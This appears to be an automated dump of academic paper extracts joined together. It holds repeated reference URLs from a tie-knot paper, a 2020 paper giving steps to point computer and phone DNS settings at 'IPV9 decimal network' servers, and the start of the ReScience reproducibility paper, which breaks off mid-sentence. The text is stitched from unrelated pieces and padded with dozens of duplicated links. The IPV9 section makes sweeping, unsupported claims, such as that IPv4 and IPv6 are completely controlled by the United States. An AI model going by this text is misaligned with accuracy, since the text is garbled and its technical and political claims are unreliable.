http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://dx.doi.org/10.7717/peerj-cs.2 Stanley RP. 1997. Enumerative combinatorics, Cambridge studies in advanced mathematics 49, vol. 1. Cambridge: Cambridge University Press. Stanley RP. 1999. Enumerative combinatorics, Cambridge studies in advanced mathematics 62, vol. 2. Cambridge: Cambridge University Press. Vejdemo-Johansson M. 2015. Random tie knots webpage. Available at http://dx.doi.org/10.6084/m9. figshare.1300138 (accessed February 2015). Wachowski A, Wachowski L, Silver J, Reeves K, Fishburne L, Moss C, Weaving H, Smith J, Foster G, Perrineau H et al. 2003. The Matrix Reloaded [Film]. USA: Warner Bros. Pictures. Hirsch et al. (2015), PeerJ Comput. 
Sci., DOI 10.7717/peerj-cs.2 15/15 https://peerj.com/computer-science/ http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.7717/peerj-cs.2 More ties than we thought Introduction Formal languages The Anatomy of a Necktie A Language for Tie-knots Language Complexity Single-depth tucks Recursive tucks Classification of the tie-knot language Enumeration Generating functions Tables of counts Aesthetics Conclusion Acknowledgements References work_2mp36ujpvjcgdc3qzaxexknpvi ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 DOI: 10.21307/ijanmc-2020-026 36 A Method to Access a Decimal Network (IPV9) Resource Guangzhou Liu, Fuya Yu Xi'an Decimal Network Technology Co. LTD Xi'an V9 Network Research Institute Co. LTD Email: 5571200@qq.com Abstract—Network security is highly valued by world leaders. The current Internet technology core is IPv4, IPv6, completely controlled by the United States. On December 14, 2017, the US Federal Communications Commission (FCC) formally abolished the net neutrality law. At that time, the Internet took on an obvious political color and posed a serious threat to Internet applications in various countries. China's economy is already highly dependent on the Internet, and if the network is disrupted, the whole country will suffer heavy losses. 
The decimal Network Standard working Group of The Ministry of Industry and Information Technology of China and The Decimal Network Information Technology Co., LTD of Shanghai have been researching on the future network for more than 20 years. Developed a complete set of decimal network framework system, completed the future network series research and development with China's independent intellectual property rights, and built the second Internet network system besides the United States. The technology has been fully tested in many places and achieved good results, truly achieving the goal of "autonomy, safety, high speed and compatibility". This paper will introduce the method of accessing decimal network resources in the current network environment. Keywords-Decimal Network; CHN; Domain Name; Network Resources Decimal network is a complete independent intellectual property rights based overall decimal digital code, the establishment of 2 256 times of cyberspace sovereignty. It includes 13 root domain name servers from the parent root, the primary root, and the zero-trust security mechanism for communication after verification. Compatible with current Internet systems, it has a future Internet architecture that overlaps geographical location and IP address space. Most Internet applications today are based on IPv4 environments. In the context of the existing Internet network, the IPV9 .chn domain name network can be accessed by setting up the existing computer or terminal. Most current computer browsers and mobile browsers support access. For example, Firefox, Google Chrome, Microsoft Edge, 360 speed browser and so on are common on computers. Safari and Baidu browser commonly used on mobile phones need to set the network DNS and point to the IPV9 DNS server before using the browser to open the website. The addresses are: 202.170.218.93 and 61.244.5.162. Once set up, you can access the resources of the decimal network in the current Internet environment. Before visiting, a few typical IPV9 sites are recommended, as shown in Table 1. Here are the steps to accessing the .C web site on your PC and mobile phone. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 37 TABLE I. TYPICAL CHN DOMAIN NAME WEBSITES Website domain name Web resources Resource management Resources to address http://www.v9.chn .chn portal website Decimal Network Standard Working Group Shanghai http://em777.chn Decimal technology introduction website Shanghai Decimal Network Information Technology Co. LTD Shanghai http://www.xav9.chn Xi 'an Decimal System portal Xi 'an Decimal Network Technology Co. LTD Xi 'an http://www.xa.chn V9 Research Institute portal Xi 'an Weijiu Research Institute Co. LTD Xi 'an http://www.hqq.chn/ The red Flag Canal craftsman Xi 'an Decimal Network Technology Co. LTD Xi 'an http://www.zjsjz.chn Zhejiang Decimal System portal website Zhejiang Decimal Network Co. LTD Hangzhou http://www.zjbdth.chn Beidou day draw Beidou Tianhua Information Technology Co. LTD Hangzhou I. COMPUTER ACCESS. CHN WEBSITE SETTINGS Introduce with Windows10 system settings (PC). 1) First click the "Network" icon on the desktop and select the "Properties" option. The interface appears as shown in Figure 1. Figure 1. Network and share Center setup interface International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 38 2) Click the "Connection: Ethernet" option in the network and Sharing Center setting interface. The interface appears as shown in Figure 2. 
Figure 2. Ethernet status interface 3) In the Ethernet status interface, click the "Properties" button. The dialog box appears as shown in Figure 3. Figure 3. Ethernet property interface 4) In the Ethernet property interface, double-click the option "Internet Protocol Version 4 (TCP/IPv4)". The dialog box appears as shown in Figure 4. Setting the preferred DNS and alternate DNS and finished setup. Figure 4. Internet Protocol version 4 (TCP/IPv4) properties 5) Open a browser. Firefox or Google Chrome is recommended. Enter http://www.hqq.chn in the browser address bar to access the IPV9 site, as shown in Figure 5. II. MOBILE ACCESS .CHN WEBSITE At present, there are many types of mobile phones, but the setting method is similar. Android mobile phone can download the plug-in (download address: https://www.dtgty.com/HomeSearch) by flow direct access. But in most cases, access to .chn resources will be more convenient over local Wi-Fi. It can also be accessed through mobile hotspots, with the same Settings as Wi-Fi and mobile hotspots. Take Huawei (Android system) mobile phone and iPhone (iOS system) mobile phone as an example to introduce the setting method of mobile DNS. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 39 A. Huawei Mobile Phone setting The phone type is HUAWEI Mate 20, Android 10 and EMUI 10.1.0. 1) Click "Settings" on the desktop of the mobile phone to display the setting interface, as shown in Figure 6. Figure 5. Access the IPV9 site Figure 6. Mobile phone Setting Interface Figure 7. Wireless connection setting interface International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 40 2) Click "Wireless LAN" in the interface, and the interface appears as shown in Figure 7. 3) Press on the connected network name for a while, and additional menu options appear, as shown in Figure 8. Click "Modify Network" menu, the interface of network parameter setting appears, and select "Display Advanced Options", as shown in Figure 9. Select the "Static" option, as shown in Figure 10. Figure 8. Modification of network Interface Figure 9. Parameter setting interface 4) Modify DNS according to the parameters in the figure. After modification, click "Save" button to complete the setting. Figure 10. Modification of network Interface Figure 11. Parameter setting interface 5) Return to the main interface of the mobile phone and enter http://www.xand.chn in the browser International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 41 (Firefox or Google Chrome) to browse the overseas study service website for testing, as shown in Figure 11. The rest are Xiaomi phones, Vivo phones and so on. You can access IPV9 network resources by simply setting the DNS Settings for the connection network. B. iPhone parameter setting Mobile phone model: iPhone XR, system: IOS13.5. 1) Click "Settings" on the desktop of the mobile phone to appear the setting interface. Click "Wireless LAN" in the interface. The interface appears as shown in Figure 12. 2) Click the icon on the right of the connected WLAN, and the network setting interface appears, as shown in Figure 13. Figure 12. Interface of wireless LAN Figure Figure 13. Interface of wireless connection parameters Figure 14. DNS Setting Interface 3) In the setting interface, select "Configure DNS" and the DNS setting interface appears, as shown in Figure 14. Select the Add Server option and enter the DNS address shown in the figure. 
Click the "Save" command in the upper right corner of the interface to complete the setup. 4) Open the browser. Enter http://www.xav9.chn in the address bar to open the main interface of Xi 'an Future Network, as shown in Figure 15. III. METHOD OF ACCESSING IPV9 WEBSITE WITH CHINESE DOMAIN NAME In addition to accessing network resources through character domain names, the decimal network system can also use Chinese domain names to access, in the format: http:// Chinese.*****, but before access to the following Settings. Take the Firefox browser, for example. 1) Open the Firefox browser and click the menu button in the upper right corner to open the browser Settings menu, as shown in Figure 16. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 42 Figure 15. Xi 'an Future Network main interface Figure 16. Firefox menu Settings screen International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 43 2) Click the "Options" command, drag the right scroll bar to the bottom of the page, and network Settings appear, as shown in Figure 17. Figure 17. Firefox menu options screen 3) Click the "Settings" button in network Settings, and the "Connection Settings" dialog box appears, as shown in Figure 18. In the Configure Proxy Server to Access the Internet option, select Do not Use proxy Server (Y), and then select Enable HTTPS DNS at the bottom of the screen. Finally enter https://doh.zsw9.cn/dns.query in the "custom" edit box. 4) After setting, click "OK" button to complete setting. Enter the Chinese domain name "China Micro Nine Research Institute" into the Firefox browser to access Chinese website resources. This is shown in Figure 19. To facilitate test access, several typical IPV9 sites are recommended, as shown in Table 2. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 44 Figure 18. Firefox connection Settings screen Figure 19. Website of Xi 'an V9 Research Institute International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 45 TABLE II. TYPICAL CHINESE DOMAIN NAME WEBSITES Character of the domain name Web resources Chinese domain name Resource management http://www.ijanmc.chn New online international journals http:// in China. New network and detection control Xi’an Technological University http://www.iccnea.chn ICCNEA International Conference Website http:// in China. The international conference on Xi’an Technological University http://www.xa.chn .chn portal website http:// in China. Micro Nine Research Institute Xi 'an Decimal Network Company http://www.xav9.chn Xi 'an Decimal System portal http:// in China. Xi 'an Future Network Portal Xi 'an Decimal Network Company http://www.xand.chn Xi 'an NORTON Study Abroad website http:// in China. Xi 'an NORTON Study Abroad Xi 'an Decimal Network Company http://www.hqq.chn The red Flag Canal craftsman http:// in China. The red Flag Canal craftsman Xi 'an Decimal Network Company http://www.xazn.chn The website of Zhengnuo Conference Company The website of Zhengnuo Conference Company Xi 'an Decimal Network Company In addition to accessing network resources through character domain names and Chinese characters, the decimal address can also be used to access resources. A website corresponds to a decimal address. At the same time, we can also realize a decimal address corresponding to multiple network resources in the way of subdirectory structure. 
Since decimal address access is bound to the computer in the background, setup is cumbersome, and only a presentation interface is provided here, as shown in Figure 20. Figure 20. Red Flag Canal Craftsman website International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 46 At present the decimal network is in the experimental application stage, although the network resources are less, but the original resources running on the Internet can be completely translated to the decimal network system. With the introduction of national policy, the decimal network of resources will be more and more. The decimal network application of China's independent intellectual property rights is bound to enter thousands of households. IV. CONCLUSION This paper introduces the method of using browser to access decimal network resources through personal computer terminal or personal mobile phone under the current Internet environment. A simple DNS setup is required to point to the decimal server to complete resource access. The setup is very simple, which lays the foundation for a wide range of network applications. REFERENCE [1] Xie Jianping. A method for assigning addresses to networked computers using full decimal algorithm, Chinese patent No. : ZL00135182.6, 2004.2.6. [2] Xie Jianping. A method for assigning addresses to networked computers using a full decimal algorithm, U.S. Patent No. :US: 8082365, [4] RFC - Internet Standard. Internet Protocol, DARPA INTERNET PROGRAM PROTOCOL SPECIFICATION, RFC 791, 1981.09. [3] S. Deering, R. Hinden, Network Working Group. Internet Protocol, Version 6 (IPv6)-Specification, RFC-1883, 1995.12. [4] M. Crawford. Network Working Group. Transmission of IPv6 Packets over Ethernet Networks. RFC-2464, 1998.12. [5] J. Onions, Network Working Group. A Historical Perspective on the usage of IP version 9. RFC1606. 1994.04. [6] V. Cerf, Network Working Group. A VIEW FROM THE 21ST CENTURY, RFC1607. 1994.04. work_2p32le2xefgk7mdiaxsaftmnmu ---- Aalborg Universitet Sustainable computational science the ReScience initiative Rougier, Nicolas; Hinsen, Konrad; Alexandre, Frédéric; Arildsen, Thomas; Barba, Lorena; Benureau, Fabien; Brown, C. Titus; de Buyl, Pierre; Caglayan, Ozan; Davison, Andrew; Delsuc, Marc André; Detorakis, Georgios; Diem, Alexandra; Drix, Damien; Enel, Pierre; Girard, Benoît; Guest, Olivia; Hall, Matt; Henriques, Rafael; Hinaut, Xavier; Jaron, Kamil; Khamassi, Mehdi; Klein, Almar; Manninen, Tiina; Marchesi, Pietro; McGlinn, Dan; Metzner, Christoph; Petchey, Owen; Ekkehard Plesser, Hans; Poisot, Timothée; Ram, Karthik; Ram, Yoav; Roesch, Etienne; Rossant, Cyrille; Rostami, Vahid; Shifman, Aaron; Stachelek, Joseph; Stimberg, Marcel; Stollmeyer, Frank; Vaggi, Federico; Viejo, Guillaume; Vitay, Julien; Vostinar, Anya; Yurchak, Roman; Zito, Tiziano Published in: PeerJ DOI (link to publication from Publisher): 10.7717/peerj-cs.142 Creative Commons License CC BY 4.0 Publication date: 2017 Document Version Publisher's PDF, also known as Version of record Link to publication from Aalborg University Citation for published version (APA): Rougier, N., Hinsen, K., Alexandre, F., Arildsen, T., Barba, L., Benureau, F., Brown, C. T., de Buyl, P., Caglayan, O., Davison, A., Delsuc, M. A., Detorakis, G., Diem, A., Drix, D., Enel, P., Girard, B., Guest, O., Hall, M., Henriques, R., ... Zito, T. (2017). Sustainable computational science: the ReScience initiative. PeerJ, 3(142e). 
https://doi.org/10.7717/peerj-cs.142 https://doi.org/10.7717/peerj-cs.142 https://vbn.aau.dk/en/publications/df049490-73ef-44b2-835f-2fc6da4c5ceb https://doi.org/10.7717/peerj-cs.142 Submitted 5 October 2017 Accepted 15 November 2017 Published 18 December 2017 Corresponding author Nicolas P. Rougier, Nicolas.Rougier@inria.fr Academic editor Feng Xia Additional Information and Declarations can be found on page 14 DOI 10.7717/peerj-cs.142 Copyright 2017 Rougier et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Sustainable computational science: the ReScience initiative Nicolas P. Rougier1, Konrad Hinsen2, Frédéric Alexandre1, Thomas Arildsen3, Lorena A. Barba4, Fabien C.Y. Benureau1, C. Titus Brown5, Pierre de Buyl6, Ozan Caglayan7, Andrew P. Davison8, Marc-André Delsuc9, Georgios Detorakis10, Alexandra K. Diem11, Damien Drix12, Pierre Enel13, Benoît Girard14, Olivia Guest15, Matt G. Hall16, Rafael N. Henriques17, Xavier Hinaut1, Kamil S. Jaron18, Mehdi Khamassi14, Almar Klein19, Tiina Manninen20, Pietro Marchesi21, Daniel McGlinn22, Christoph Metzner23, Owen Petchey24, Hans Ekkehard Plesser25, Timothée Poisot26, Karthik Ram27, Yoav Ram28, Etienne Roesch29, Cyrille Rossant30, Vahid Rostami31, Aaron Shifman32, Joseph Stachelek33, Marcel Stimberg34, Frank Stollmeier35, Federico Vaggi36, Guillaume Viejo14, Julien Vitay37, Anya E. Vostinar38, Roman Yurchak39 and Tiziano Zito40 1 INRIA Bordeaux Sud-Ouest, Talence, France 2 Centre de Biophysique Moléculaire UPR4301, CNRS, Orléans, France 3 Department of Electronic Systems, Technical Faculty of IT and Design, Aalborg University, Aalborg, Denmark 4 Department of Mechanical and Aerospace Engineering, The George Washington University, Washington, D.C., USA 5 Department of Population Health and Reproduction, University of California Davis, Davis, CA, USA 6 Instituut voor Theoretische Fysica, KU Leuven, Leuven, Belgium 7 Laboratoire d’Informatique (LIUM), Le Mans University, Le Mans, France 8 UNIC FRE 3693, CNRS, Gif-sur-Yvette, France 9 Institut de Génétique et de Biologie Moléculaire et Cellulaire, Illkirch, France 10 Department of Cognitive Sciences, University of California Irvine, Irvine, CA, USA 11 Computational Engineering and Design, University of Southampton, Southampton, United Kingdom 12 Humboldt Universität zu Berlin, Berlin, Germany 13 Department of Neuroscience, Mount Sinai School of Medicine, New York, NY, USA 14 Institute of Intelligent Systems and Robotics, Sorbonne Universités - UPMC Univ Paris 06 - CNRS, Paris, France 15 Experimental Psychology, University College London, London, Greater London, United Kingdom 16 UCL Great Ormond St Institute of Child Health, London, United Kingdom 17 Champalimaud Centre for the Unknown, Champalimaud Neuroscience Program, Lisbon, Portugal 18 Department of Ecology and Evolution, University of Lausanne, Lausanne, Switzerland 19 Independent scholar, Enschede, The Netherlands 20 BioMediTech Institute and Faculty of Biomedical Sciences and Engineering, Tampere University of Technology, Tampere, Finland 21 Swammerdam Institute for Life Sciences, University of Amsterdam, Amsterdam, The Netherlands 22 Department of Biology, College of Charleston, Charleston, SC, USA 23 Centre for Computer Science and Informatics Research, University of Hertfordshire, Hatfield, United Kingdom 24 Department of Evolutionary Biology and Environmental Studies, University of Zurich, Zurich, Switzerland 25 Faculty of Science and Technology, Norwegian University of Life Sciences, Aas, Norway 26 Département de Sciences 
Biologiques, Université de Montréal, Montréal, QC, Canada 27 Berkeley Institute for Data Science, University of California, Berkeley, CA, USA 28 Department of Biology, Stanford University, Stanford, CA, USA 29 Centre for Integrative Neuroscience, University of Reading, Reading, United Kingdom 30 Institute of Neurology, University College London, London, United Kingdom How to cite this article Rougier et al. (2017), Sustainable computational science: the ReScience initiative. PeerJ Comput. Sci. 3:e142; DOI 10.7717/peerj-cs.142 https://peerj.com mailto:Nicolas.Rougier@inria.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.142 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.142 31 Institute of Neuroscience & Medicine, Juelich Forschungszentrum, Jülich, Germany 32 Department of Biology, University of Ottawa, Ottawa, Ontario, Canada 33 Department of Fisheries and Wildlife, Michigan State University, East Lansing, MI, USA 34 Sorbonne Universités/UPMC Univ Paris 06/INSERM/CNRS/Institut de la Vision, Paris, France 35 Max Planck Institute for Dynamics and Self-Organization, Göttingen, Lower Saxony, Germany 36 Amazon, Seattle, WA, USA 37 Department of Computer Science, Chemnitz University of Technology, Chemnitz, Saxony, Germany 38 Department of Computer Science, Grinnell College, Grinnell, IA, USA 39 Symerio, Palaiseau, France 40 Neural Information Processing Group, Eberhard Karls Universität Tübingen, Tübingen, Germany ABSTRACT Computer science offers a large set of tools for prototyping, writing, running, testing, validating, sharing and reproducing results; however, computational science lags behind. In the best case, authors may provide their source code as a compressed archive and they may feel confident their research is reproducible. But this is not exactly true. James Buckheit and David Donoho proposed more than two decades ago that an article about computational results is advertising, not scholarship. The actual scholarship is the full software environment, code, and data that produced the result. This implies new workflows, in particular in peer-reviews. Existing journals have been slow to adapt: source codes are rarely requested and are hardly ever actually executed to check that they produce the results advertised in the article. ReScience is a peer-reviewed journal that targets computational research and encourages the explicit replication of already published research, promoting new and open-source implementations in order to ensure that the original research can be replicated from its description. To achieve this goal, the whole publishing chain is radically different from other traditional scientific journals. ReScience resides on GitHub where each new implementation of a computational study is made available together with comments, explanations, and software tests. Subjects Data Science, Digital Libraries, Scientific Computing and Simulation, Social Computing Keywords Computational science, Open science, Publication, Reproducible, Replicable, Sustainable, GitHub, Open peer-review INTRODUCTION There is a replication crisis in Science (Baker, 2016; Munafò et al., 2017). This crisis has been highlighted in fields as diverse as medicine (Ioannidis, 2005), psychology (Open Science Collaboration, 2015), the political sciences (Janz, 2015), and recently in the biomedical sciences (Iqbal et al., 2016). 
The reasons behind such non-replicability are as diverse as the domains in which it occurs. In medicine, factors such as study power and bias, the number of other studies on the same question, and importantly, the ratio of true to no relationships among the all relationships probed have been highlighted as important causes (Ioannidis, 2005). In psychology, non-replicability has been blamed on spurious p-values (p-hacking), while in the biomedical sciences (Iqbal et al., 2016), a lack of access to full datasets and Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 2/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.142 detailed protocols for both clinical and non-clinical biomedical investigation is seen as a critical factor. The same remarks were recently issued for chemistry (Coudert, 2017). Surprisingly, the computational sciences (in the broad sense) and computer sciences (in the strict sense) are no exception (Donoho et al., 2009; Manninen, Havela & Linne, 2017) despite the fact they rely on code and data rather than on experimental observations, which should make them immune to the aforementioned problems. When Colberg and colleagues (2016) decided to measure the extent of the problem precisely, they investigated the availability of code and data as well as the extent to which this code would actually build with reasonable effort. The results were dramatic: of the 515 (out of 613) potentially reproducible papers targeted by the study, the authors managed to ultimately run only 102 (less than 20%). These low numbers only reflect the authors’ success at running the code. They did not check for correctness of the code (i.e., does the code actually implement what is advertised in the paper), nor the reproducibility of the results (does each run lead to the same results as in the paper). One example of this problem can be found in Topalidou et al. (2015), in which the authors tried to replicate results obtained from a computational neuroscience model. Source code was not available, neither as supplementary material to the paper nor in a public repository. When the replicators obtained the source code after contacting the corresponding author, they found that it could not be compiled and would be difficult to reuse for other purposes. Confronted with this problem, a small but growing number of journals and publishers have reacted by adopting explicit policies for data and software. Examples can be seen in the PLOS instructions on Materials and Software Sharing and on Data Availability, and in the recent announcement by eLife on forking (creating a linked copy of) software used in eLife papers to GitHub. Such policies help to ensure access to code and data in a well-defined format (Perkel, 2016) but this will not guarantee reproducibility nor correctness. At the educational and methodological levels, things have started to change with a growing literature on best practices for making computations reproducible (Sandve et al., 2013; Crook, Davison & Plesser, 2013; Wilson et al., 2014; Halchenko & Hanke, 2015; Janz, 2015; Hinsen, 2015). Related initiatives such as Software and Data Carpentry (Wilson, 2016) are of note since their goal is to make scientists more productive, and their work more reliable, by teaching them basic computing skills. Such best practices could be applied to already published research codebases as well, provided the original authors are willing to take on the challenge of re-implementing their software for the sake of better science. 
Unfortunately, this is unlikely since the incentives for doing such time-consuming work are low or nonexistent. Furthermore, if the original authors made mistakes in their original implementation, it seems likely that they will reproduce their mistakes in any re-implementation. REPLICATION AND REPRODUCTION While recognition of the replication crisis as a problem for scientific research has increased over time, unfortunately no common terminology has emerged so far. One reason for the diverse use of terms is that each field of research has its own specific technical and Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 3/17 https://peerj.com http://journals.plos.org/plosone/s/materials-and-software-sharing http://journals.plos.org/plosone/s/data-availability https://elifesciences.org/elife-news/inside-elife-forking-software-used-elife-papers-github http://dx.doi.org/10.7717/peerj-cs.142 social obstacles on the road to publishing results and findings that can be verified by other scientists. Here we briefly summarize the obstacles that arise from the use of computers and software in scientific research, and introduce the terminology we will use in the rest of this article. We note, however, that there is some disagreement about this particular choice of terminology even among the authors of this article. Reproducing the result of a computation means running the same software on the same input data and obtaining the same results. The goal of a reproduction attempt is to verify that the computational protocol leading to the results has been recorded correctly. Performing computations reproducibly can be seen as a form of provenance tracking, the software being a detailed record of all data processing steps. In theory, computation is a deterministic process and exact reproduction should therefore be trivial. In reality, it is very difficult to achieve because of the complexity of today’s software stacks and the tediousness of recording all interactions between a scientist and a computer (although a number of recent tools have attempted to automate such recording, e.g., Guo & Engler, 2011; Davison, 2012; Murta et al., 2015). Mesnard and Barba explain (Mesnard & Barba, 2017) how difficult it can be to reproduce a two-year-old computation even though all possible precautions were taken at the time to ensure reproducibility. The most frequent obstacles are the loss of parts of the software or input data, lack of a computing environment that is sufficiently similar to the one used initially, and insufficient instructions for making the software work. An obstacle specific to numerical computations is the use of floating-point arithmetic, whose rules are subject to slightly different interpretations by different compilers and runtime support systems. A large variety of research practices and support tools have been developed recently to facilitate reproducible computations. For a collection of recipes that have proven useful, see Kitzes, Turek & Deniz (2017). Publishing a reproducible computational result implies publishing all the software and all the input data, or references to previously published software and data, along with the traditional article describing the work. An obvious added value is the availability of the software and data, which helps readers to gain a better understanding of the work, and can be re-used in other research projects. 
In addition, reproducibly published results are more trustworthy, because many common mistakes in working with computers can be excluded: mistyping parameter values or input file names, updating the software but forgetting to mention the changes in the description of the method, planning to use one version of some software but actually using a different one, etc. Strictly speaking, reproducibility is defined in the context of identical computational environments. However, useful scientific software is expected to be robust with respect to certain changes in this environment. A computer program that produces different results when compiled using different compilers, or run on two different computers, would be considered suspect by most practitioners, even if it were demonstrably correct in one specific environment. Ultimately it is not the software that is of interest for science, but the models and methods that it implements. The software is merely a vehicle to perform computations based on these models and methods. If results depend on hard-to-control Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 4/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.142 implementation details of the software, their relation to the underlying models and methods becomes unclear and unreliable. Replicating a published result means writing and then running new software based on the description of a computational model or method provided in the original publication, and obtaining results that are similar enough to be considered equivalent. What exactly ‘‘similar enough’’ means strongly depends on the kind of computation being performed, and can only be judged by an expert in the field. The main obstacle to replicability is an incomplete or imprecise description of the models and methods. Replicability is a much stronger quality indicator than reproducibility. In fact, reproducibility merely guarantees that all the ingredients of a computation are well documented. It does not imply that any of them are correct and/or appropriate for implementing the models and methods that were meant to be applied, nor that the descriptions of these models and methods are correct and clear. A successful replication shows that two teams have produced independent implementations that generate equivalent results, which makes serious mistakes in either implementation unlikely. Moreover, it shows that the second team was able to understand the description provided by the first team. Replication can be attempted for both reproducible and non-reproducible results. However, when an attempt to replicate non-reproducible work fails, yielding results too different to be considered equivalent, it can be very difficult to identify the cause of the disagreement. Reproducibility guarantees the existence of a precise and complete description of the models and methods being applied in the original work, in the form of software source code, which can be analyzed during the investigation of any discrepancies. The holy grail of computational science is therefore a reproducible replication of reproducible original work. THE RESCIENCE INITIATIVE Performing a replication is a daunting task that is traditionally not well rewarded. Nevertheless, some people are willing to replicate computational research. The motivations for doing so are very diverse (see Box 1). Students may want to familiarize themselves with a specific scientific domain, and acquire relevant practical experience by replicating important published work. 
Senior researchers may critically need a specific piece of code for a research project and therefore re-implement a published computational method. If these people write a brand new open source implementation of already published research, it is likely that this new implementation will be of interest for other people as well, including the original authors. The question is where to publish such a replication. To the best of our knowledge, no major journal accepts replications in computational science for publication. This was the main motivation for the creation of the ReScience journal (https://rescience.github.io) by Konrad Hinsen and Nicolas P. Rougier in September 2015. Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 5/17 https://peerj.com https://rescience.github.io http://dx.doi.org/10.7717/peerj-cs.142 Box 1. Authors having published in Rescience explain their motivation. (Stachelek, 2016) I was motivated to replicate the results of the original paper because I feel that working through code supplements to blog posts has really helped me learn the process of scientific analysis. I could have published my replication as a blog post but I wanted the exposure and permanency that goes along with journal articles. This was my first experience with formal replication. I think the review was useful because it forced me to consider how the replication would be used by people other than my- self. I have not yet experienced any new interactions following publication. However, I did notify the author of the original implementation about the replication’s publi- cation. I think this may lead to future correspondence. The original author suggested that he would consider submitting his own replications to ReScience in the future. (Topalidou & Rougier, 2015) Our initial motivation and the main reason for replicating the model is that we needed it in order to collaborate with our 